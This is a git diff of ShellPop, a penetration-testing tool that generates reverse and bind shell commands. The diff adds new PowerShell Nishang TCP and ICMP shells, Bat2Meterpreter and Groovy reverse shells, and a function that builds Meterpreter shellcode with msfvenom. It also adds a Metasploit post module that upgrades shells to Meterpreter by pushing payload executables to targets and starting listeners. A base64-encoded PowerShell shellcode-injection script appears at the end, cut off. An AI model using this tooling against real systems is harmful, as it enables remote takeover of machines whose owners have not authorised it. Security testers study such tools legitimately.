diff --git a/.gitignore b/.gitignore index 5be32b6..7c6b8f1 100644 --- a/.gitignore +++ b/.gitignore @@ -7,3 +7,6 @@ dist/ dist/* test/ test/* +.idea/* +venv/* +venv/ \ No newline at end of file diff --git a/README.md b/README.md index 80b5f33..d4f9f76 100644 --- a/README.md +++ b/README.md @@ -1,20 +1,20 @@ # ShellPop ## About - Pop shells like a master - Shell pop is all about popping shells. With this tool you can - generate easy and sophisticated reverse or bind shell commands - to help you during penetration tests. - Don't waste more time with .txt files storing your Reverse shells! +Shellpop is all about popping shells. With this tool you can +generate easy and sofisticated reverse or bind shell commands +to help you during penetration tests. + +Don't waste more time with .txt files storing your Reverse shells! ----- ## Installation -Python 2.x is required. +Python 2.7 is required. 3.0+ version will not work. **Required Dependencies Install** ```bash -root@kali# apt-get install python-argcomplete -y +root@kali# apt-get install python-argcomplete metasploit-framework -y ``` ```bash root@kali# pip install -r requirements.txt @@ -32,6 +32,7 @@ root@kali# python setup.py install * [Basics](#basics) * [Encoders](#encoders) * [Handlers](#handlers) +* [Meterpreter Shells](#meterpreter-shells-new) * [Stagers](#stagers) * [Protocols](#protocols) * [Credits](#credits) @@ -63,6 +64,11 @@ root@kali# shellpop --list ![ShellsList](img/img-shell-list.JPG?raw=true) +##### Auto-Complete [NEW] + +Now shellpop has auto-complete feature. To use it, you need to forget about --number and (--reverse or --bind), just stick to --payload argument. Like the image below: + +![Autocomplete](img/img-shell-autocomplete.JPG?raw=true) ### __Basics__ ----- @@ -132,12 +138,17 @@ Handler is a mechanism to "handle" the act of serving a socket to receive the in Currently there is support of the following TCP handlers: 1. TCP PTY Handlers -2. TCP Handlers +2. TCP Meta-Handlers [NEW] This means every TCP shell can have appended to their command-line argument the `--handler` option. Removing the necessity of the operator to spawn the handler (probably ncat or nc) by himself. ![Screenshot](img/handler.gif?raw=true) +### __Meterpreter Shells__ [NEW] +This feature was widely asked by people who used this tool. Now it is technically possible to upgrade all shellpop shells to meterpreter, as since 0.3.6, handler uses by default the Metasploit Framework to land shells. + +![Meterpreter](img/handler-meterpreter.gif?raw=true) + ----- ### __Stagers__ Stager is a mechanism of serving your payload in STAGES. Sometimes payload complexity or size can get troublesome. In such cases, you can craft a small payload which in turn can request and execute the bigger one. @@ -161,6 +172,7 @@ Currently there is support of two protocols to land your shells: 1. TCP 2. UDP +3. ICMP (Nishang ICMP shell) #### *Command line examples* ##### TCP is blocked but UDP is not? Let there be shell! diff --git a/bin/shellpop b/bin/shellpop index 3db8e12..19d4553 100644 --- a/bin/shellpop +++ b/bin/shellpop @@ -15,12 +15,9 @@ # Github: https://github.com/touhidshaikh -import urllib import pyperclip -import os import netifaces import argcomplete -from sys import exit from argparse import ArgumentParser from sys import stderr from random import randint @@ -31,9 +28,9 @@ from shellpop import * # Get current Operational System -write=stderr.write -flush=stderr.flush -version = 0.35 # updated 02/05/2018 +write = stderr.write +flush = stderr.flush +version = 0.36 # updated 04/06/2018 AVAILABLE_SHELLS = [ @@ -41,11 +38,11 @@ AVAILABLE_SHELLS = [ { # Introducing the new Shell object to hold # Information about the shells. Look below. - 1: Shell("Python TCP +pty", # name + 1: Shell("Python TCP +pty", # name "python", "bind", # shell type "tcp", # protocol - BIND_PYTHON_TCP(), # code + BIND_PYTHON_TCP(), # code system="linux", arch="Independent", use_handler=bind_tcp_pty_handler, @@ -179,7 +176,17 @@ AVAILABLE_SHELLS = [ system="windows", arch="x86 / x64", use_handler=bind_tcp_handler, - use_http_stager=WINDOWS_STAGERS), + use_http_stager=[WINDOWS_STAGERS[0]]), + + 15: Shell("Windows Powershell Nishang TCP", + "powershell_nishang", + "bind", + "tcp", + BIND_POWERSHELL_NISHANG_TCP(), + system="windows", + arch="x86 / x64", + use_handler=bind_tcp_handler, + use_http_stager=[(1, PurePowershell_HTTP_Stager)]) }, # Reverse shell list @@ -272,7 +279,7 @@ AVAILABLE_SHELLS = [ system="windows", arch="x86 / x64", use_handler=reverse_tcp_handler, - use_http_stager=WINDOWS_STAGERS), + use_http_stager=[WINDOWS_STAGERS[0]]), 10: Shell("TCLsh TCP", "tclsh", @@ -384,15 +391,15 @@ AVAILABLE_SHELLS = [ use_handler=None, use_http_stager=LINUX_STAGERS), - 21: Shell("Windows Ncat TCP - x64", - "bat2exe_ncat_x64", + 21: Shell("Windows Bat2Ncat TCP", + "bat2exe_ncat", "reverse", "tcp", REVERSE_WINDOWS_NCAT_TCP(), system="windows", - arch="x64", + arch="x86 / x64", use_handler=reverse_tcp_handler, - use_http_stager=list(filter(lambda x: x[0] not in [1,3], WINDOWS_STAGERS )) ), + use_http_stager=list(filter(lambda x: x[0] not in [3, 1], WINDOWS_STAGERS))), 22: Shell("Windows Powershell Shellcode-Injection a.k.a BloodSeeker TCP - x64", "powershell_shellcode_injection", @@ -402,7 +409,7 @@ AVAILABLE_SHELLS = [ system="windows", arch="x64", use_handler=None, - use_http_stager=[(1, Powershell_HTTP_Stager),]), # This will only work with powershell. + use_http_stager=[(1, PurePowershell_HTTP_Stager)]), # This will only work with powershell. 23: Shell("Windows Powershell Tiny TCP", "powershell_tiny", @@ -412,13 +419,54 @@ AVAILABLE_SHELLS = [ system="windows", arch="x86 / x64", use_handler=reverse_tcp_handler, - use_http_stager=WINDOWS_STAGERS), + use_http_stager=[WINDOWS_STAGERS[0]]), + + 24: Shell("Windows Powershell Nishang TCP", + "powershell_nishang", + "reverse", + "tcp", + REVERSE_POWERSHELL_NISHANG_TCP(), + system="windows", + arch="x86 / x64", + use_handler=reverse_tcp_handler, + use_http_stager=[(1, PurePowershell_HTTP_Stager)]), + + 25: Shell("Windows Powershell Nishang ICMP", + "powershell_nishang", + "reverse", + "icmp", + REVERSE_POWERSHELL_ICMP(), + system="windows", + arch="x86 / x64", + use_handler=None, + use_http_stager=[(1, PurePowershell_HTTP_Stager)]), + + 26: Shell("Windows Bat2Meterpreter TCP", + "bat2meterpreter", + "reverse", + "tcp", + REVERSE_WINDOWS_BAT2METERPRETER_TCP(), + system="windows", + arch="x86 / x64", + use_handler=None, + use_http_stager=list(filter(lambda x: x[0] not in [1, 3], WINDOWS_STAGERS))), + + 27: Shell("Groovy TCP", + "groovy", + "reverse", + "tcp", + REVERSE_GROOVY_TCP(), + system="multi", + arch="Independent", + use_handler=reverse_tcp_handler, + use_http_stager=list(filter(lambda x: x[0] not in [1], WINDOWS_STAGERS))), } ] bind_shells = AVAILABLE_SHELLS[0] reverse_shells = AVAILABLE_SHELLS[1] - + + def proto_colorize(shell_name): """ This code is responsible to colorize @@ -426,12 +474,14 @@ def proto_colorize(shell_name): """ proto_avail = [ ("UDP", "94"), - ("TCP", "93")] # available protocols to colorize. + ("TCP", "93"), + ("ICMP", "92"), ] # available protocols to colorize. for proto in proto_avail: if proto[0] in shell_name: shell_name = shell_name.replace(proto[0], "\033[{0}m{1}\033[0m".format(proto[1], proto[0])) return shell_name + def list_shells(): write(info("\033[1mBind shells\033[0m:\n\n")) for i in range(1, len(bind_shells)+1): @@ -459,9 +509,13 @@ def check_shell_number(number, reverse=True): return None return True + def header(): contributors = ["@zc00l", "@touhidshaikh", "@lowfuel"] - return "\033[093mshellpop\033[0m v{0}\n\033[93mContributors\033[0m: {1}\n\n".format(version, ','.join([x for x in contributors])) + return "\033[093mshellpop\033[0m v{0}\n\033[93mContributors\033[0m: {1}\n\n".format(version, + ','.join([x for x in + contributors])) + def select_shell(args, shell_type, shell_index): @@ -500,34 +554,39 @@ def get_shells(prefix, parsed_args, **kwargs): all_shells.extend(bind_shells.values()) return [x.get_full_name() for x in all_shells] -def get_shell_number(string, dataset): + +def get_shell_number(str_data, dataset): """ Returns the correct integer from shell lists using a short_name @zc00l """ for shell in dataset: obj = dataset[shell] - if obj.get_full_name() == string: + if obj.get_full_name() == str_data: return shell return None + def main(): parser = ArgumentParser(epilog='Pop shells like a master. For more help visit:https://github.com/0x00-0x00/ShellPop') parser._optionals.title = "Options" # List mode - parser.add_argument("-l","--list", help="List of available shells", action="store_true") + parser.add_argument("-l", "--list", help="List of available shells", action="store_true") # Program parameters - parser.add_argument("-H","--host", type=str, help="IP to be used in connectback (reverse) shells.") - parser.add_argument("-P","--port", type=int, help="Port to be used in reverse/bind shell code.") + parser.add_argument("-H", "--host", type=str, help="IP to be used in connectback (reverse) shells.") + parser.add_argument("-P", "--port", type=int, help="Port to be used in reverse/bind shell code.") parser.add_argument("--number", type=int, help="Shell code index number", required=False) - parser.add_argument("--shell", type=str, default="", help="Terminal shell to be used when decoding some encoding scheme.", required=False) + parser.add_argument("--shell", type=str, default="", + help="Terminal shell to be used when decoding some encoding scheme.", required=False) # Shell Type payload_arg = parser.add_argument_group('Shell Types') - payload_arg.add_argument("--reverse", action="store_true", help="Victim communicates back to the attacking machine.") - payload_arg.add_argument("--bind", action="store_true",help="Open up a listener on the victim machine.") + payload_arg.add_argument("--reverse", action="store_true", + help="Victim communicates back to the attacking machine.") + payload_arg.add_argument("--bind", action="store_true", help="Open up a listener on the victim machine.") + #payload_arg.add_argument("-M", "--meterpreter", action="store_true", help="Upgrades shell to a meterpreter session.") # Alternative way to select shell payloads, using auto-tab completion. payload_arg.add_argument("--payload", required=False, help="Choose the payload").completer = get_shells @@ -536,12 +595,14 @@ def main(): encoders = parser.add_argument_group('Encoders Options') encoders.add_argument("--xor", action="store_true",help="Enable XOR obfuscation", required=False) encoders.add_argument("--base64", action="store_true", required=False, help="Encode command in base64.") - encoders.add_argument("--urlencode", action="store_true", required=False, help="Encode the command in URL encoding.") + encoders.add_argument("--urlencode", action="store_true", required=False, + help="Encode the command in URL encoding.") # Use handler if possible. - parser.add_argument("--handler", action="store_true", help="Use handler, if possible.", default=False, required=False) + parser.add_argument("--handler", action="store_true", help="Use handler, if possible.", default=False, + required=False) - #Staging + # Staging stagingarg = parser.add_argument_group("Staging Options") # Use staging stagingarg.add_argument("--stager", type=str, help="Use staging for shells", required=False) @@ -552,17 +613,19 @@ def main(): powershell_arg = parser.add_argument_group("PowerShell options") powershell_arg.add_argument("--powershell-x86", action="store_true", help="Use powershell 32-bit executable.") powershell_arg.add_argument("--powershell-x64", action="store_true", help="Use powershell 64-bit executable.") - powershell_arg.add_argument("--powershell-random-case", action="store_true", help="Use random-case in powershell payloads.") + powershell_arg.add_argument("--powershell-random-case", action="store_true", help="Use random-case in powershell \ + payloads.") - #Miscellaneous + # Miscellaneous miscarg = parser.add_argument_group("Miscellaneous") # Send it to clipboard - miscarg.add_argument("--clip", action="store_true", help="Copy payload to your clipboard automatically.", default=False, required=False) + miscarg.add_argument("--clip", action="store_true", help="Copy payload to your clipboard automatically.", + default=False, required=False) - argcomplete.autocomplete(parser) # register it to auto-completion + argcomplete.autocomplete(parser) # register it to auto-completion args = parser.parse_args() - if args.list == True: + if args.list: write(header()) list_shells() exit(0) @@ -573,8 +636,8 @@ def main(): bind_int = get_shell_number(args.payload, bind_shells) if reverse_int: - args.reverse = True # this sets --reverse - args.number = reverse_int # this sets --number + args.reverse = True # this sets --reverse + args.number = reverse_int # this sets --number elif bind_int: args.bind = True args.number = bind_int @@ -599,12 +662,12 @@ def main(): exit(1) if args.host in [str(x) for x in netifaces.interfaces()]: - args.host = str(netifaces.ifaddresses(args.host)[2][0]["addr"]) # translate iface name to ipv4 + args.host = str(netifaces.ifaddresses(args.host)[2][0]["addr"]) # translate iface name to ipv4 if args.xor is True: - args.xor = randint(0,255) + args.xor = randint(0, 255) else: - args.xor = 0 # no Xor encoding! + args.xor = 0 # no Xor encoding! if args.reverse is True: if not check_shell_number(args.number, reverse=True): @@ -618,7 +681,7 @@ def main(): exit(1) shell = select_shell(args, "reverse", args.number) if shell.handler is not None: - shell.handler_args = ('0.0.0.0', args.port) + shell.handler_args = (args, shell) else: if not check_shell_number(args.number, reverse=False): print(error("Invalid bind shell number.")) @@ -630,14 +693,16 @@ def main(): if args.handler is not False: if args.host is None: args.host = raw_input("[\033[092m*\033[0m] Remote host IP address: ") - shell.handler_args = (args.host, args.port) + shell.handler_args = (args, shell) # This is the spot for stagers. # First, we need to detect if the operator # wants it. - stager = None # this is a local scope variable now. + stager = None # this is a local scope variable now. stager_thread = None stager_payload = None + old_dir = os.getcwd() # initialize current working directory. + if args.stager is not None: # He wants stager. @@ -647,11 +712,10 @@ def main(): else: # This is the HTTP stager code. # I will try to host a HTTP server in the following ports: - ports = [80,8080,8081] + ports = [80, 8080, 8081] ports.insert(0, args.http_port) if args.http_port is not None else None - OLD_DIR = os.getcwd() - os.chdir("/tmp") # currently only linux. + os.chdir("/tmp") # currently only linux. # /tmp because it is where we are going to host our payloads for port in ports: @@ -684,7 +748,6 @@ def main(): else: print(error("Cant use port {0} as HTTP server port.".format(port))) - to_be_executed = shell.payload if stager is None else stager_payload if args.clip is True: @@ -715,8 +778,9 @@ def main(): except KeyboardInterrupt: print(info("Killing HTTP server ...")) stager_thread.terminate() - os.chdir(OLD_DIR) # restore working directory. + os.chdir(old_dir) # restore working directory. return 0x0 + if __name__ == "__main__": main() diff --git a/extras/how-to-install-and-use.txt b/extras/how-to-install-and-use.txt new file mode 100644 index 0000000..f075d4b --- /dev/null +++ b/extras/how-to-install-and-use.txt @@ -0,0 +1,26 @@ +# How to install Shellpop shell_to_meterpreter module into metasploit-framework +# Obviously, you will need to have metasploit framework 4 installed in the +system. If you are smart then you're using Kali already and dont need to worry +with that. + +root@kali# mkdir -p ~/.msf4/modules/post/shellpop +root@kali# cp extras/shell_to_meterpreter ~/.msf4/modules/post/shellpop + +# Now boot metasploit-framework (msfconsole) and you will find the module in + +post/shellpop/shell_to_meterpreter + +# With a command shell open, you can CTRL+Z (background) the shell and do +this procedure: + +use post/shellpop/shell_to_meterpreter +set SESSION 1 +set IS_POWERSHELL true # if it is a powershell shell +run +# This should upgrade your shell to meterpreter. + +# FAQ: +# 1. Why dont you use default module shell_to_meterpreter? +# 1A: It has some trouble into detecting PowerShell in some Windows Machines. +I find that very annoying. So it was far more easier to just set a Boolean +variable to skip PowerShell detection and just use it. diff --git a/extras/shell_to_meterpreter.rb b/extras/shell_to_meterpreter.rb new file mode 100644 index 0000000..d105b85 --- /dev/null +++ b/extras/shell_to_meterpreter.rb @@ -0,0 +1,353 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/exploit/powershell' +require 'msf/core/post/windows/powershell' + +class MetasploitModule < Msf::Post + include Exploit::Powershell + include Post::Windows::Powershell + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Shell to Meterpreter Upgrade', + 'Description' => %q{ + This module attempts to upgrade a command shell to meterpreter. The shell + platform is automatically detected and the best version of meterpreter for + the target is selected. Currently meterpreter/reverse_tcp is used on Windows + and Linux, with 'python/meterpreter/reverse_tcp' used on all others. + }, + 'License' => MSF_LICENSE, + 'Author' => ['Tom Sellers '], + 'Platform' => [ 'linux', 'osx', 'unix', 'solaris', 'bsd', 'windows' ], + 'SessionTypes' => [ 'shell' ] + )) + register_options( + [ + OptAddressLocal.new('LHOST', + [false, 'IP of host that will receive the connection from the payload (Will try to auto detect).', nil]), + OptInt.new('LPORT', + [true, 'Port for payload to connect to.', 4433]), + OptBool.new('HANDLER', + [ true, 'Start an exploit/multi/handler to receive the connection', true]) + ]) + register_advanced_options([ + OptBool.new("IS_POWERSHELL", + [true, "Check this if it is a powershell shell", true]), + OptInt.new('HANDLE_TIMEOUT', + [true, 'How long to wait (in seconds) for the session to come back.', 30]), + OptEnum.new('WIN_TRANSFER', + [true, 'Which method to try first to transfer files on a Windows target.', 'POWERSHELL', ['POWERSHELL', 'VBS']]), + OptString.new('PAYLOAD_OVERRIDE', + [false, 'Define the payload to use (meterpreter/reverse_tcp by default) .', nil]), + OptString.new('BOURNE_PATH', + [false, 'Remote path to drop binary']), + OptString.new('BOURNE_FILE', + [false, 'Remote filename to use for dropped binary']) + ]) + deregister_options('PERSIST', 'PSH_OLD_METHOD', 'RUN_WOW64') + end + + # Run method for when run command is issued + def run + print_status("Upgrading session ID: #{datastore['SESSION']}") + + # Try hard to find a valid LHOST value in order to + # make running 'sessions -u' as robust as possible. + if datastore['LHOST'] + lhost = datastore['LHOST'] + elsif framework.datastore['LHOST'] + lhost = framework.datastore['LHOST'] + else + lhost = session.tunnel_local.split(':')[0] + if lhost == 'Local Pipe' + print_error 'LHOST is "Local Pipe", please manually set the correct IP.' + return + end + end + + # If nothing else works... + lhost = Rex::Socket.source_address if lhost.blank? + + lport = datastore['LPORT'] + + # Handle platform specific variables and settings + case session.platform + when 'windows' + platform = 'windows' + payload_name = 'windows/meterpreter/reverse_tcp' + lplat = [Msf::Platform::Windows] + larch = [ARCH_X86] + psh_arch = 'x86' + vprint_status("Platform: Windows") + when 'osx' + platform = 'osx' + payload_name = 'osx/x64/meterpreter/reverse_tcp' + lplat = [Msf::Platform::OSX] + larch = [ARCH_X64] + vprint_status("Platform: OS X") + when 'solaris' + platform = 'python' + payload_name = 'python/meterpreter/reverse_tcp' + vprint_status("Platform: Solaris") + else + # Find the best fit, be specific with uname to avoid matching hostname or something else + target_info = cmd_exec('uname -ms') + if target_info =~ /linux/i && target_info =~ /86/ + # Handle linux shells that were identified as 'unix' + platform = 'linux' + payload_name = 'linux/x86/meterpreter/reverse_tcp' + lplat = [Msf::Platform::Linux] + larch = [ARCH_X86] + vprint_status("Platform: Linux") + elsif target_info =~ /darwin/i + platform = 'osx' + payload_name = 'osx/x64/meterpreter/reverse_tcp' + lplat = [Msf::Platform::OSX] + larch = [ARCH_X64] + vprint_status("Platform: OS X") + elsif cmd_exec('python -V 2>&1') =~ /Python (2|3)\.(\d)/ + # Generic fallback for OSX, Solaris, Linux/ARM + platform = 'python' + payload_name = 'python/meterpreter/reverse_tcp' + vprint_status("Platform: Python [fallback]") + end + end + payload_name = datastore['PAYLOAD_OVERRIDE'] if datastore['PAYLOAD_OVERRIDE'] + vprint_status("Upgrade payload: #{payload_name}") + + if platform.blank? + print_error("Shells on the target platform, #{session.platform}, cannot be upgraded to Meterpreter at this time.") + return nil + end + + payload_data = generate_payload(lhost, lport, payload_name) + if payload_data.blank? + print_error("Unable to build a suitable payload for #{session.platform} using payload #{payload_name}.") + return nil + end + + if datastore['HANDLER'] + listener_job_id = create_multihandler(lhost, lport, payload_name) + if listener_job_id.blank? + print_error("Failed to start exploit/multi/handler on #{datastore['LPORT']}, it may be in use by another process.") + return nil + end + end + + case platform + when 'windows' + vprint_status("Session type: #{session.type}") + if session.type == 'powershell' or datastore["IS_POWERSHELL"] == true + vprint_status("Powershell flag has been set.") + template_path = Rex::Powershell::Templates::TEMPLATE_DIR + psh_payload = case datastore['Powershell::method'] + when 'net' + Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload_data) + when 'reflection' + Rex::Powershell::Payload.to_win32pe_psh_reflection(template_path, payload_data) + when 'old' + Rex::Powershell::Payload.to_win32pe_psh(template_path, payload_data) + when 'msil' + fail RuntimeError, 'MSIL Powershell method no longer exists' + else + fail RuntimeError, 'No Powershell method specified' + end + + # prepend_sleep => 1 + psh_payload = 'Start-Sleep -s 1;' << psh_payload + encoded_psh_payload = encode_script(psh_payload) + cmd_exec(run_hidden_psh(encoded_psh_payload, psh_arch, true)) + else # shell + if (have_powershell?) && (datastore['WIN_TRANSFER'] != 'VBS') + vprint_status("Transfer method: Powershell") + psh_opts = { :prepend_sleep => 1, :encode_inner_payload => true, :persist => false } + cmd_exec(cmd_psh_payload(payload_data, psh_arch, psh_opts)) + else + print_error('Powershell is not installed on the target.') if datastore['WIN_TRANSFER'] == 'POWERSHELL' + vprint_status("Transfer method: VBS [fallback]") + exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data) + aborted = transmit_payload(exe, platform) + end + end + when 'python' + vprint_status("Transfer method: Python") + cmd_exec("echo \"#{payload_data}\" | python") + else + vprint_status("Transfer method: Bourne shell [fallback]") + exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data) + aborted = transmit_payload(exe, platform) + end + + if datastore['HANDLER'] + vprint_status("Cleaning up handler") + cleanup_handler(listener_job_id, aborted) + end + return nil + end + + def transmit_payload(exe, platform) + # + # Generate the stager command array + # + linemax = 1700 + if (session.exploit_datastore['LineMax']) + linemax = session.exploit_datastore['LineMax'].to_i + end + opts = { + :linemax => linemax, + #:nodelete => true # keep temp files (for debugging) + } + case platform + when 'windows' + opts[:decoder] = File.join(Rex::Exploitation::DATA_DIR, "exploits", "cmdstager", 'vbs_b64') + cmdstager = Rex::Exploitation::CmdStagerVBS.new(exe) + when 'osx' + opts[:background] = true + cmdstager = Rex::Exploitation::CmdStagerPrintf.new(exe) + else + opts[:background] = true + opts[:temp] = datastore['BOURNE_PATH'] + opts[:file] = datastore['BOURNE_FILE'] + cmdstager = Rex::Exploitation::CmdStagerBourne.new(exe) + end + + cmds = cmdstager.generate(opts) + if cmds.nil? || cmds.length < 1 + print_error('The command stager could not be generated.') + raise ArgumentError + end + + # + # Calculate the total size + # + total_bytes = 0 + cmds.each { |cmd| total_bytes += cmd.length } + + vprint_status("Starting transfer...") + begin + # + # Run the commands one at a time + # + sent = 0 + aborted = false + cmds.each { |cmd| + ret = cmd_exec(cmd) + if !ret + aborted = true + else + ret.strip! + aborted = true if !ret.empty? && ret !~ /The process tried to write to a nonexistent pipe./ + end + if aborted + print_error('Error: Unable to execute the following command: ' + cmd.inspect) + print_error('Output: ' + ret.inspect) if ret && !ret.empty? + break + end + + sent += cmd.length + + progress(total_bytes, sent) + } + rescue ::Interrupt + # TODO: cleanup partial uploads! + aborted = true + rescue => e + print_error("Error: #{e}") + aborted = true + end + + return aborted + end + + def cleanup_handler(listener_job_id, aborted) + # Return if the job has already finished + return nil if framework.jobs[listener_job_id].nil? + framework.threads.spawn('ShellToMeterpreterUpgradeCleanup', false) { + if !aborted + timer = 0 + vprint_status("Waiting up to #{HANDLE_TIMEOUT} seconds for the session to come back") + while !framework.jobs[listener_job_id].nil? && timer < HANDLE_TIMEOUT + sleep(1) + timer += 1 + end + end + print_status('Stopping exploit/multi/handler') + framework.jobs.stop_job(listener_job_id) + } + end + + # + # Show the progress of the upload + # + def progress(total, sent) + done = (sent.to_f / total.to_f) * 100 + print_status("Command stager progress: %3.2f%% (%d/%d bytes)" % [done.to_f, sent, total]) + end + + # Method for checking if a listener for a given IP and port is present + # will return true if a conflict exists and false if none is found + def check_for_listener(lhost, lport) + client.framework.jobs.each do |k, j| + if j.name =~ / multi\/handler/ + current_id = j.jid + current_lhost = j.ctx[0].datastore['LHOST'] + current_lport = j.ctx[0].datastore['LPORT'] + if lhost == current_lhost && lport == current_lport.to_i + print_error("Job #{current_id} is listening on IP #{current_lhost} and port #{current_lport}") + return true + end + end + end + return false + end + + # Starts a exploit/multi/handler session + def create_multihandler(lhost, lport, payload_name) + pay = client.framework.payloads.create(payload_name) + pay.datastore['LHOST'] = lhost + pay.datastore['LPORT'] = lport + print_status('Starting exploit/multi/handler') + if !check_for_listener(lhost, lport) + # Set options for module + mh = client.framework.exploits.create('multi/handler') + mh.share_datastore(pay.datastore) + mh.datastore['WORKSPACE'] = client.workspace + mh.datastore['PAYLOAD'] = payload_name + mh.datastore['EXITFUNC'] = 'thread' + mh.datastore['ExitOnSession'] = true + # Validate module options + mh.options.validate(mh.datastore) + # Execute showing output + mh.exploit_simple( + 'Payload' => mh.datastore['PAYLOAD'], + 'LocalInput' => self.user_input, + 'LocalOutput' => self.user_output, + 'RunAsJob' => true + ) + + # Check to make sure that the handler is actually valid + # If another process has the port open, then the handler will fail + # but it takes a few seconds to do so. The module needs to give + # the handler time to fail or the resulting connections from the + # target could end up on on a different handler with the wrong payload + # or dropped entirely. + select(nil, nil, nil, 5) + return nil if framework.jobs[mh.job_id.to_s].nil? + + return mh.job_id.to_s + else + print_error('A job is listening on the same local port') + return nil + end + end + + def generate_payload(lhost, lport, payload_name) + payload = framework.payloads.create(payload_name) + options = "LHOST=#{lhost} LPORT=#{lport}" + buf = payload.generate_simple('OptionStr' => options) + buf + end +end diff --git a/img/handler-meterpreter.gif b/img/handler-meterpreter.gif new file mode 100644 index 0000000..c526c59 Binary files /dev/null and b/img/handler-meterpreter.gif differ diff --git a/img/handler.gif b/img/handler.gif index 3e36110..a781850 100644 Binary files a/img/handler.gif and b/img/handler.gif differ diff --git a/img/img-shell-autocomplete.JPG b/img/img-shell-autocomplete.JPG new file mode 100644 index 0000000..a11a4c6 Binary files /dev/null and b/img/img-shell-autocomplete.JPG differ diff --git a/src/binary.py b/src/binary.py index 1e0a2e5..8b55580 100644 --- a/src/binary.py +++ b/src/binary.py @@ -1,4 +1,19 @@ from subprocess import Popen, PIPE +from binascii import hexlify + + +def shellcode_to_hex(msf_payload, host, port): + """ + Function to generate a common, encoded meterpreter shellcode + and return it as a hex string as binascii.hexlify does. + @zc00l + """ + proc = Popen("msfvenom -p {0} LHOST={1} LPORT={2} EXITFUNC=thread -f raw -b '\\x00\\x20\\x0d\\x0a'".format( + msf_payload, host, port), shell=True, stdout=PIPE, stderr=PIPE + ) + stdout, _ = proc.communicate() + return hexlify(stdout) + def shellcode_to_ps1(msf_payload, host, port): """ @@ -14,6 +29,7 @@ def shellcode_to_ps1(msf_payload, host, port): f.close() return "@(" + ", ".join([hex(ord(x)) for x in stdout]) + ")" + def binary_to_bat(base64_data, file="file"): """ Get a huge base64, split it into chunks. @@ -23,9 +39,9 @@ def binary_to_bat(base64_data, file="file"): """ bat_content = "@echo off\n" - count = 0 # how many bytes we have processed. - max_chars = 128 # How many bytes of data an echo command will insert into a file. - line = str() # This is going represent a single line that is going to be processed in loop. + count = 0 # how many bytes we have processed. + max_chars = 128 # How many bytes of data an echo command will insert into a file. + line = str() # This is going represent a single line that is going to be processed in loop. # This loop will populate line and then dump the formatted command to bat_content. for char in list(base64_data): @@ -44,11 +60,12 @@ def binary_to_bat(base64_data, file="file"): return bat_content - -# This is where we store our binary payloads. +# This is where we store our binary payloads. WINDOWS_BLOODSEEKER_SCRIPT = """"ZnVuY3Rpb24gTG9jYWw6R2V0LURlbGVnYXRlVHlwZQogICAgewogICAgICAgIFBhcmFtCiAgICAgICAgKAogICAgICAgICAgICBbT3V0cHV0VHlwZShbVHlwZV0pXQogICAgICAgICAgICAKICAgICAgICAgICAgW1BhcmFtZXRlciggUG9zaXRpb24gPSAwKV0KICAgICAgICAgICAgW1R5cGVbXV0KICAgICAgICAgICAgJFBhcmFtZXRlcnMgPSAoTmV3LU9iamVjdCBUeXBlW10oMCkpLAogICAgICAgICAgICAKICAgICAgICAgICAgW1BhcmFtZXRlciggUG9zaXRpb24gPSAxICldCiAgICAgICAgICAgIFtUeXBlXQogICAgICAgICAgICAkUmV0dXJuVHlwZSA9IFtWb2lkXQogICAgICAgICkKCiAgICAgICAgJERvbWFpbiA9IFtBcHBEb21haW5dOjpDdXJyZW50RG9tYWluCiAgICAgICAgJER5bkFzc2VtYmx5ID0gTmV3LU9iamVjdCBTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseU5hbWUoJ1JlZmxlY3RlZERlbGVnYXRlJykKICAgICAgICAkQXNzZW1ibHlCdWlsZGVyID0gJERvbWFpbi5EZWZpbmVEeW5hbWljQXNzZW1ibHkoJER5bkFzc2VtYmx5LCBbU3lzdGVtLlJlZmxlY3Rpb24uRW1pdC5Bc3NlbWJseUJ1aWxkZXJBY2Nlc3NdOjpSdW4pCiAgICAgICAgJE1vZHVsZUJ1aWxkZXIgPSAkQXNzZW1ibHlCdWlsZGVyLkRlZmluZUR5bmFtaWNNb2R1bGUoJ0luTWVtb3J5TW9kdWxlJywgJGZhbHNlKQogICAgICAgICRUeXBlQnVpbGRlciA9ICRNb2R1bGVCdWlsZGVyLkRlZmluZVR5cGUoJ015RGVsZWdhdGVUeXBlJywgJ0NsYXNzLCBQdWJsaWMsIFNlYWxlZCwgQW5zaUNsYXNzLCBBdXRvQ2xhc3MnLCBbU3lzdGVtLk11bHRpY2FzdERlbGVnYXRlXSkKICAgICAgICAkQ29uc3RydWN0b3JCdWlsZGVyID0gJFR5cGVCdWlsZGVyLkRlZmluZUNvbnN0cnVjdG9yKCdSVFNwZWNpYWxOYW1lLCBIaWRlQnlTaWcsIFB1YmxpYycsIFtTeXN0ZW0uUmVmbGVjdGlvbi5DYWxsaW5nQ29udmVudGlvbnNdOjpTdGFuZGFyZCwgJFBhcmFtZXRlcnMpCiAgICAgICAgJENvbnN0cnVjdG9yQnVpbGRlci5TZXRJbXBsZW1lbnRhdGlvbkZsYWdzKCdSdW50aW1lLCBNYW5hZ2VkJykKICAgICAgICAkTWV0aG9kQnVpbGRlciA9ICRUeXBlQnVpbGRlci5EZWZpbmVNZXRob2QoJ0ludm9rZScsICdQdWJsaWMsIEhpZGVCeVNpZywgTmV3U2xvdCwgVmlydHVhbCcsICRSZXR1cm5UeXBlLCAkUGFyYW1ldGVycykKICAgICAgICAkTWV0aG9kQnVpbGRlci5TZXRJbXBsZW1lbnRhdGlvbkZsYWdzKCdSdW50aW1lLCBNYW5hZ2VkJykKICAgICAgICAKICAgICAgICBXcml0ZS1PdXRwdXQgJFR5cGVCdWlsZGVyLkNyZWF0ZVR5cGUoKQogICAgfQoKZnVuY3Rpb24gTG9jYWw6RW1pdC1DYWxsVGhyZWFkU3R1YiAoW0ludFB0cl0gJEJhc2VBZGRyLCBbSW50UHRyXSAkRXhpdFRocmVhZEFkZHIsIFtJbnRdICRBcmNoaXRlY3R1cmUpCiAgICB7CiAgICAgICAgJEludFNpemVQdHIgPSAkQXJjaGl0ZWN0dXJlIC8gOAoKICAgICAgICBmdW5jdGlvbiBMb2NhbDpDb252ZXJ0VG8tTGl0dGxlRW5kaWFuIChbSW50UHRyXSAkQWRkcmVzcykKICAgICAgICB7CiA